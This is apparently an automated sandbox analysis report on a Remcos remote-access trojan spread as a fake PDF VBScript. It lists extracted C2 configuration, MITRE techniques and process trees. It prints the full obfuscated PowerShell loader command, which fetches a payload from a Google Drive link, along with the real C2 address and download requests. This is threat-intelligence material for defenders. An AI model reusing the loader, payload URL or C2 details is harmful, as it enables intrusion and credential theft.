remcos | fcaa4716a7f8e4a85a36cbad09b39eb8d42e3e8014becd4007ca8d2acf66656b

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
10/12/2024, 01:10 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Bunker_STS_pdf.vbs
Size

13KB
MD5

d337850be4db2196fbd9b40b714ba227
SHA1

e43b4b7c792001b7c91bd03471d94f2bc1dbd66f
SHA256

029802343fbb801604ed9508ebd34ea0eff7873afb6b308f5dfad5db56ac5f8c
SHA512

4ffb485d2e5dac71db20b6a8b24cf0073600c4f9ac709d9579a45478c3629195d0fda258b447fef8dbd9e77bb4bd4990ffe1113880f542f6136397b4ca135a12
SSDEEP

384:1DY35T6OmW8azd5vpecmEzqwVqIxJuRoSiZsyvVx:1DYJ+O5vpecmExjSRXZ+

Score

10^/10

remcos remotehost collection discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

154.216.18.214:2404

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-AOD6MB
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/4040-77-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/412-73-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/224-71-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/412-73-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/224-71-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 10 IoCs

flow	pid	Process
15	4864	powershell.exe
17	4864	powershell.exe
27	1156	msiexec.exe
31	1156	msiexec.exe
33	1156	msiexec.exe
35	1156	msiexec.exe
36	1156	msiexec.exe
48	1156	msiexec.exe
49	1156	msiexec.exe
51	1156	msiexec.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	msiexec.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4864	powershell.exe
2696	powershell.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Z:	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
27	drive.google.com
14	drive.google.com
15	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
1156	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2696	powershell.exe
1156	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1156 set thread context of 224	1156	msiexec.exe	96
PID 1156 set thread context of 412	1156	msiexec.exe	97
PID 1156 set thread context of 4040	1156	msiexec.exe	99

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
4864	powershell.exe
4864	powershell.exe
2696	powershell.exe
2696	powershell.exe
2696	powershell.exe
224	msiexec.exe
224	msiexec.exe
4040	msiexec.exe
4040	msiexec.exe
224	msiexec.exe
224	msiexec.exe

Suspicious behavior: MapViewOfSection 5 IoCs

pid	Process
2696	powershell.exe
1156	msiexec.exe
1156	msiexec.exe
1156	msiexec.exe
1156	msiexec.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4864	powershell.exe
Token: SeDebugPrivilege	2696	powershell.exe
Token: SeDebugPrivilege	4040	msiexec.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 4636 wrote to memory of 4864	4636	WScript.exe	83
PID 4636 wrote to memory of 4864	4636	WScript.exe	83
PID 2696 wrote to memory of 1156	2696	powershell.exe	93
PID 2696 wrote to memory of 1156	2696	powershell.exe	93
PID 2696 wrote to memory of 1156	2696	powershell.exe	93
PID 2696 wrote to memory of 1156	2696	powershell.exe	93
PID 1156 wrote to memory of 224	1156	msiexec.exe	96
PID 1156 wrote to memory of 224	1156	msiexec.exe	96
PID 1156 wrote to memory of 224	1156	msiexec.exe	96
PID 1156 wrote to memory of 224	1156	msiexec.exe	96
PID 1156 wrote to memory of 412	1156	msiexec.exe	97
PID 1156 wrote to memory of 412	1156	msiexec.exe	97
PID 1156 wrote to memory of 412	1156	msiexec.exe	97
PID 1156 wrote to memory of 412	1156	msiexec.exe	97
PID 1156 wrote to memory of 3912	1156	msiexec.exe	98
PID 1156 wrote to memory of 3912	1156	msiexec.exe	98
PID 1156 wrote to memory of 3912	1156	msiexec.exe	98
PID 1156 wrote to memory of 4040	1156	msiexec.exe	99
PID 1156 wrote to memory of 4040	1156	msiexec.exe	99
PID 1156 wrote to memory of 4040	1156	msiexec.exe	99
PID 1156 wrote to memory of 4040	1156	msiexec.exe	99

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Bunker_STS_pdf.vbs"
1⤵
- Checks computer location settings
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:4636
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Tetrapyramid='Biseriately';;$Afsnitsnumrets='Expositoriness';;$Tomastedearovize='Tractile';;$Oncogene='Poniarded40';;$solfeggios=$host.Name;function Terrorhandlingerne($Nettovgtenes41){If ($solfeggios) {$Antitangent=3} for ($Tomastede=$Antitangent;;$Tomastede+=4){if(!$Nettovgtenes41[$Tomastede]){$Domsmands90++;break }$Guaranteer+=$Nettovgtenes41[$Tomastede];$Recite='shims'}$Guaranteer}function windslab($Filmguide){ .($Ovoelliptic) ($Filmguide)}$Bombastiskes=Terrorhandlingerne 'BilnFore .stUnc. jW';$Bombastiskes+=Terrorhandlingerne 'slae.anBMisCstel,raIIndEst NTriT';$Ranglers=Terrorhandlingerne 'CudMsuro P.zIlii Brl nkl MeaOpt/';$sparrier=Terrorhandlingerne ' B TC el.yhsMta1st 2';$Folkekommunistisk='Kan[ seNFrgEWagT A..datsKrieHovrUndV M iRooC AneJetp Inosi.iP nn sat N.M spAArcNRevaAingEu.EBe.rKu ] re:O,s: ZosJu EsteCMeiuOpsrLegIFo TstaYBomP BarE,eODocTNonOAarCH.noElmLPre= ec$Ol.s L.pPenasalrHierstaI yret er';$Ranglers+=Terrorhandlingerne ' Jo5Aff.Ple0Cys Teg(H.dWFlliAnhnBr,dAnro ewConsfor AmpNU dTInd Cha1 om0 Re.Fra0 .e; ba BreWstoi.ndnBla6 Ap4Arr;Jen ,hxDep6Obl4Dri;Lyn CorAt vspr:sk 1Cic3 M 1,kt.Lrt0M,c) k PinGsdve sic Trk skosna/Con2A.d0.ma1spa0 P 0 Ak1B.h0.ut1uni IntFKoniThur aeQuef W,oE,ex,ns/ ka1.an3,ne1K.c.At 0';$Uddrog=Terrorhandlingerne 'U oU mpsd.teNewR ar-Co Asipg HaeElenUdbT';$Blindeinstituttet=Terrorhandlingerne ' Poh evtsamtNatpU dsPh : Ve/Gr./Joud HarBe,iTelvvioeHel.PregA soC oosatgsamlu leR t.NivcPloosukm Ms/svausancCon?Ovee,omx kopsanota rMartsup=G,ldKono uawTypn rlM goLysaF.ad Bi&A liPladoli=Hed1k exEtnnAr orecF g 5s ajMetyGeiiUdliAmtH.mpo U 0 omt echV ta enaTr 9Plak O.GHaa0sikHB sxRea4 aF MaiForTyelcRumUNav0A,czR tbJugo';$seksaarsdrenges=Terrorhandlingerne 'Pri>';$Ovoelliptic=Terrorhandlingerne 'Bu,IO tE C X';$Mrkelgge='supercerebellar';$Krigslisten='\Elgtyre.Bev';windslab (Terrorhandlingerne ' ve$EclgPseLPreo pBHenA Kal Ko: rkM HyeUfoIKeres rr.es=Na $AkseEjeNFrivsto: T a AfpsmgpscrDTroa onts.aaBin+Nip$sunKFlaRDeciWhegGlasDysL Nei osBurtExpeThun');windslab (Terrorhandlingerne 'sna$Refg,rmlIndoGe.b B A ubl f:RepbHaleTilRHdet ,shAndesa rPa =Op $.krbUnmLco IFransipDNonENonIFlan Grs ApttilImactRagUOphT uptsgeebe,tTan.Da.ss epBesLFani nnt ut(Far$ EvsTemeHagkAgnsAk,A GoADisrlezsRefdTrarH rEPu nMedgHe eRe.sga,)');windslab (Terrorhandlingerne $Folkekommunistisk);$Blindeinstituttet=$Berther[0];$Medaljonernes=(Terrorhandlingerne 'dup$ IngCysL leO ruBTj.a s lsch:FstmEtyaP aNBi dForODagLHy,ICreNLynePhy=E,fnPodes iw T.-s,bO M bspijOveeBesCMectPa. Ov sBe YForsgentCo,E ImMsta.Fa $TetBsneO,ubMForBTkkA CesAntt PhIRessUp.KB lEUdas');windslab ($Medaljonernes);windslab (Terrorhandlingerne 'For$couMstea CanBe,dUv oMatlLoniHofnKrye Ti. QuH Lie taa N dDise BerbagsKli[Cey$C.nUPotdHexdTrursauo org G.] pi=Aur$ rRModa tanMong all dfeslerDoms');$Hardset=Terrorhandlingerne 'st.$skrM inaR gn F dL.koHehlOuti F nOvee,ac.F iD M oKahwBlinIstl F.oTekaJawd iaFNoni G l yreBoe(Unp$ PyBAr li pistun ads ee Gri FenK esPritMo iVeltMonuFeut TrtOd e sttCam,Uni$CenBPe aUncgbkkhW.sjAniu apl.ideB,nt VisVa.)';$Baghjulets=$meier;windslab (Terrorhandlingerne ' ,i$.ahGU ylpocODrabsp,A Nol sn:ProBTetYGagg Goe MeTsanTCal= ld(Afkt PoE idsturtR p-OraPUniAsweTWonh k. ,er$KvaB FoAPa,GCheH vJ InuUn.lPeaeRacT elsarc)');while (!$Bygett) {windslab (Terrorhandlingerne ' T.$ sagPesl s oRetb npaOv lrev:semAsttaMetnsacdstae ivBedepetrAnvdForeMolndebeUdsrGennEneeK,nsFav=se $PraFPanr roiA thDecePsedTras sagskroUnfddateWitt .us') ;windslab $Hardset;windslab (Terrorhandlingerne ' NospriT spAPreRMazT to-Dwes s.l AfetruEAn,p .a Per4');windslab (Terrorhandlingerne 'Gal$br.gVrelLigOudkbBdeAPlaL s:Dribim,YsnkGDa,ETratUdsTDo =Evi(vaet FyEWebsDattKri- eP GaAIsftUdshslv sub$KrybB.ya JugFr.h suJtrsuA tLTikEUpbTOmbs ga)') ;windslab (Terrorhandlingerne 'is $,osgPolLCano.roB oADarl v:M nIsu,MPanARu GkoniRehnBefr,idT De=Per$Pr GMa L s OFreb oraRaaL.or: ChpTooR oO lgTEtpeBesIFrsNerkRBi iK yGchoTGro+Ble+ Me%Gro$OrdBA rEPrir KatB cH ieHerrRha.snnCThoo AnUKe NAr t') ;$Blindeinstituttet=$Berther[$Imaginrt]}$sparsomst=281401;$Nihilities=30050;windslab (Terrorhandlingerne 'Mat$ImpGLarl Afo MibFlaA crL Af: alu es BosKrlE Trl ehi MigBe.eDo sM t ,ph= U s kgrhoEs mt Y -BricExpoU sn E t oeUnsnsektCap Ud $Forb yrAPe,GP th BlJ T.U skL omEEndTKols');windslab (Terrorhandlingerne ',re$ pogs.glDanoDi.bs aaCoal Te:LydT FreflorGemaD mpFusesuru Udtsak Tog=Era .es[ LisH ny amsAn.tsoleC,im rn.P rCDrio Nen Rev s eskar ststr] j:Mon:CarFTigrUnjoKolmPseBAnaaPiss PieAsp6skr4 lysVoktFrarCogispan GagUnd(The$MilUBaas sasChaeirol AliF agstaePo ssem)');windslab (Terrorhandlingerne 'Jun$scagH,rldeaoChoBPilaMo LDob:ExhgManr epU E,pT lP TyeV.gs notplur K.uK.rkCent enUDejRB.oEEthnBers lu se=Cat .ns[ ersBreyDiss N tPenEBa.mExp.u,dTscreAdvx crt le. DreUfonRepCTeooir d Mui.adNHobGsag]Arc: He: soALaus UncRy.IIseI sk.UndgKolePoitaabs stT NoR stI aNtr GKic(Pa $IsptsphEAniRJacaBemp ffe onUsmetFor)');windslab (Terrorhandlingerne 'Tym$EbiG PelFatoOveb maaA,glses:squK ogn G aunaGspiesioRUnskDonkc,nes.us st= Om$ anGIn RstauVa pBagpAskEP tsVittandRVapU,meKInitsynULoprUnhEInnNTass,ro.Chas,omuParb bes iTsynR HdI Ren rgTvi(Tel$BussCelp,gta ovRC asDekOAn.MAnts arTbid, n$ OnnCarI yaHPdaIAntLEleiA stMori yeU.rsDa )');windslab $Knagerkkes;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4864

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Tetrapyramid='Biseriately';;$Afsnitsnumrets='Expositoriness';;$Tomastedearovize='Tractile';;$Oncogene='Poniarded40';;$solfeggios=$host.Name;function Terrorhandlingerne($Nettovgtenes41){If ($solfeggios) {$Antitangent=3} for ($Tomastede=$Antitangent;;$Tomastede+=4){if(!$Nettovgtenes41[$Tomastede]){$Domsmands90++;break }$Guaranteer+=$Nettovgtenes41[$Tomastede];$Recite='shims'}$Guaranteer}function windslab($Filmguide){ .($Ovoelliptic) ($Filmguide)}$Bombastiskes=Terrorhandlingerne 'BilnFore .stUnc. jW';$Bombastiskes+=Terrorhandlingerne 'slae.anBMisCstel,raIIndEst NTriT';$Ranglers=Terrorhandlingerne 'CudMsuro P.zIlii Brl nkl MeaOpt/';$sparrier=Terrorhandlingerne ' B TC el.yhsMta1st 2';$Folkekommunistisk='Kan[ seNFrgEWagT A..datsKrieHovrUndV M iRooC AneJetp Inosi.iP nn sat N.M spAArcNRevaAingEu.EBe.rKu ] re:O,s: ZosJu EsteCMeiuOpsrLegIFo TstaYBomP BarE,eODocTNonOAarCH.noElmLPre= ec$Ol.s L.pPenasalrHierstaI yret er';$Ranglers+=Terrorhandlingerne ' Jo5Aff.Ple0Cys Teg(H.dWFlliAnhnBr,dAnro ewConsfor AmpNU dTInd Cha1 om0 Re.Fra0 .e; ba BreWstoi.ndnBla6 Ap4Arr;Jen ,hxDep6Obl4Dri;Lyn CorAt vspr:sk 1Cic3 M 1,kt.Lrt0M,c) k PinGsdve sic Trk skosna/Con2A.d0.ma1spa0 P 0 Ak1B.h0.ut1uni IntFKoniThur aeQuef W,oE,ex,ns/ ka1.an3,ne1K.c.At 0';$Uddrog=Terrorhandlingerne 'U oU mpsd.teNewR ar-Co Asipg HaeElenUdbT';$Blindeinstituttet=Terrorhandlingerne ' Poh evtsamtNatpU dsPh : Ve/Gr./Joud HarBe,iTelvvioeHel.PregA soC oosatgsamlu leR t.NivcPloosukm Ms/svausancCon?Ovee,omx kopsanota rMartsup=G,ldKono uawTypn rlM goLysaF.ad Bi&A liPladoli=Hed1k exEtnnAr orecF g 5s ajMetyGeiiUdliAmtH.mpo U 0 omt echV ta enaTr 9Plak O.GHaa0sikHB sxRea4 aF MaiForTyelcRumUNav0A,czR tbJugo';$seksaarsdrenges=Terrorhandlingerne 'Pri>';$Ovoelliptic=Terrorhandlingerne 'Bu,IO tE C X';$Mrkelgge='supercerebellar';$Krigslisten='\Elgtyre.Bev';windslab (Terrorhandlingerne ' ve$EclgPseLPreo pBHenA Kal Ko: rkM HyeUfoIKeres rr.es=Na $AkseEjeNFrivsto: T a AfpsmgpscrDTroa onts.aaBin+Nip$sunKFlaRDeciWhegGlasDysL Nei osBurtExpeThun');windslab (Terrorhandlingerne 'sna$Refg,rmlIndoGe.b B A ubl f:RepbHaleTilRHdet ,shAndesa rPa =Op $.krbUnmLco IFransipDNonENonIFlan Grs ApttilImactRagUOphT uptsgeebe,tTan.Da.ss epBesLFani nnt ut(Far$ EvsTemeHagkAgnsAk,A GoADisrlezsRefdTrarH rEPu nMedgHe eRe.sga,)');windslab (Terrorhandlingerne $Folkekommunistisk);$Blindeinstituttet=$Berther[0];$Medaljonernes=(Terrorhandlingerne 'dup$ IngCysL leO ruBTj.a s lsch:FstmEtyaP aNBi dForODagLHy,ICreNLynePhy=E,fnPodes iw T.-s,bO M bspijOveeBesCMectPa. Ov sBe YForsgentCo,E ImMsta.Fa $TetBsneO,ubMForBTkkA CesAntt PhIRessUp.KB lEUdas');windslab ($Medaljonernes);windslab (Terrorhandlingerne 'For$couMstea CanBe,dUv oMatlLoniHofnKrye Ti. QuH Lie taa N dDise BerbagsKli[Cey$C.nUPotdHexdTrursauo org G.] pi=Aur$ rRModa tanMong all dfeslerDoms');$Hardset=Terrorhandlingerne 'st.$skrM inaR gn F dL.koHehlOuti F nOvee,ac.F iD M oKahwBlinIstl F.oTekaJawd iaFNoni G l yreBoe(Unp$ PyBAr li pistun ads ee Gri FenK esPritMo iVeltMonuFeut TrtOd e sttCam,Uni$CenBPe aUncgbkkhW.sjAniu apl.ideB,nt VisVa.)';$Baghjulets=$meier;windslab (Terrorhandlingerne ' ,i$.ahGU ylpocODrabsp,A Nol sn:ProBTetYGagg Goe MeTsanTCal= ld(Afkt PoE idsturtR p-OraPUniAsweTWonh k. ,er$KvaB FoAPa,GCheH vJ InuUn.lPeaeRacT elsarc)');while (!$Bygett) {windslab (Terrorhandlingerne ' T.$ sagPesl s oRetb npaOv lrev:semAsttaMetnsacdstae ivBedepetrAnvdForeMolndebeUdsrGennEneeK,nsFav=se $PraFPanr roiA thDecePsedTras sagskroUnfddateWitt .us') ;windslab $Hardset;windslab (Terrorhandlingerne ' NospriT spAPreRMazT to-Dwes s.l AfetruEAn,p .a Per4');windslab (Terrorhandlingerne 'Gal$br.gVrelLigOudkbBdeAPlaL s:Dribim,YsnkGDa,ETratUdsTDo =Evi(vaet FyEWebsDattKri- eP GaAIsftUdshslv sub$KrybB.ya JugFr.h suJtrsuA tLTikEUpbTOmbs ga)') ;windslab (Terrorhandlingerne 'is $,osgPolLCano.roB oADarl v:M nIsu,MPanARu GkoniRehnBefr,idT De=Per$Pr GMa L s OFreb oraRaaL.or: ChpTooR oO lgTEtpeBesIFrsNerkRBi iK yGchoTGro+Ble+ Me%Gro$OrdBA rEPrir KatB cH ieHerrRha.snnCThoo AnUKe NAr t') ;$Blindeinstituttet=$Berther[$Imaginrt]}$sparsomst=281401;$Nihilities=30050;windslab (Terrorhandlingerne 'Mat$ImpGLarl Afo MibFlaA crL Af: alu es BosKrlE Trl ehi MigBe.eDo sM t ,ph= U s kgrhoEs mt Y -BricExpoU sn E t oeUnsnsektCap Ud $Forb yrAPe,GP th BlJ T.U skL omEEndTKols');windslab (Terrorhandlingerne ',re$ pogs.glDanoDi.bs aaCoal Te:LydT FreflorGemaD mpFusesuru Udtsak Tog=Era .es[ LisH ny amsAn.tsoleC,im rn.P rCDrio Nen Rev s eskar ststr] j:Mon:CarFTigrUnjoKolmPseBAnaaPiss PieAsp6skr4 lysVoktFrarCogispan GagUnd(The$MilUBaas sasChaeirol AliF agstaePo ssem)');windslab (Terrorhandlingerne 'Jun$scagH,rldeaoChoBPilaMo LDob:ExhgManr epU E,pT lP TyeV.gs notplur K.uK.rkCent enUDejRB.oEEthnBers lu se=Cat .ns[ ersBreyDiss N tPenEBa.mExp.u,dTscreAdvx crt le. DreUfonRepCTeooir d Mui.adNHobGsag]Arc: He: soALaus UncRy.IIseI sk.UndgKolePoitaabs stT NoR stI aNtr GKic(Pa $IsptsphEAniRJacaBemp ffe onUsmetFor)');windslab (Terrorhandlingerne 'Tym$EbiG PelFatoOveb maaA,glses:squK ogn G aunaGspiesioRUnskDonkc,nes.us st= Om$ anGIn RstauVa pBagpAskEP tsVittandRVapU,meKInitsynULoprUnhEInnNTass,ro.Chas,omuParb bes iTsynR HdI Ren rgTvi(Tel$BussCelp,gta ovRC asDekOAn.MAnts arTbid, n$ OnnCarI yaHPdaIAntLEleiA stMori yeU.rsDa )');windslab $Knagerkkes;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2696
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:1156
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\kdhrujpyzlshhnpxkobcogoo"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:224
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\vxucvcazntkmrbljczoertjfaif"
    3⤵
    - Accesses Microsoft Outlook accounts
    - System Location Discovery: System Language Discovery
    PID:412
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\frzuvmltjbcquhznlkifbxvoixputfk"
    3⤵
    PID:3912
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\frzuvmltjbcquhznlkifbxvoixputfk"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4040

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

196.249.167.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.249.167.52.in-addr.arpa

IN PTR

Response
DNS

86.49.80.91.in-addr.arpa

Remote address:

8.8.8.8:53

Request

86.49.80.91.in-addr.arpa

IN PTR

Response
DNS

71.31.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

71.31.126.40.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

drive.google.com

msiexec.exe

Remote address:

8.8.8.8:53

Request

drive.google.com

IN A

Response

drive.google.com

IN A

172.217.169.78
GET

https://drive.google.com/uc?export=download&id=1xnoF5jyiiHo0thaa9kG0Hx4FiTcU0zbo

powershell.exe

Remote address:

172.217.169.78:443

Request

GET /uc?export=download&id=1xnoF5jyiiHo0thaa9kG0Hx4FiTcU0zbo HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: drive.google.com
Connection: Keep-Alive

Response

HTTP/1.1 303 See Other

Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Tue, 10 Dec 2024 01:10:25 GMT
Location: https://drive.usercontent.google.com/download?id=1xnoF5jyiiHo0thaa9kG0Hx4FiTcU0zbo&export=download
Strict-Transport-Security: max-age=31536000
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: script-src 'nonce-6uPbW_jHOUtnV78IOVW9IQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
Cross-Origin-Opener-Policy: same-origin
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

drive.usercontent.google.com

msiexec.exe

Remote address:

8.8.8.8:53

Request

drive.usercontent.google.com

IN A

Response

drive.usercontent.google.com

IN A

216.58.212.225
GET

https://drive.usercontent.google.com/download?id=1xnoF5jyiiHo0thaa9kG0Hx4FiTcU0zbo&export=download

powershell.exe

Remote address:

216.58.212.225:443

Request

GET /download?id=1xnoF5jyiiHo0thaa9kG0Hx4FiTcU0zbo&export=download HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: drive.usercontent.google.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="Modlysblnde.hhk"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, 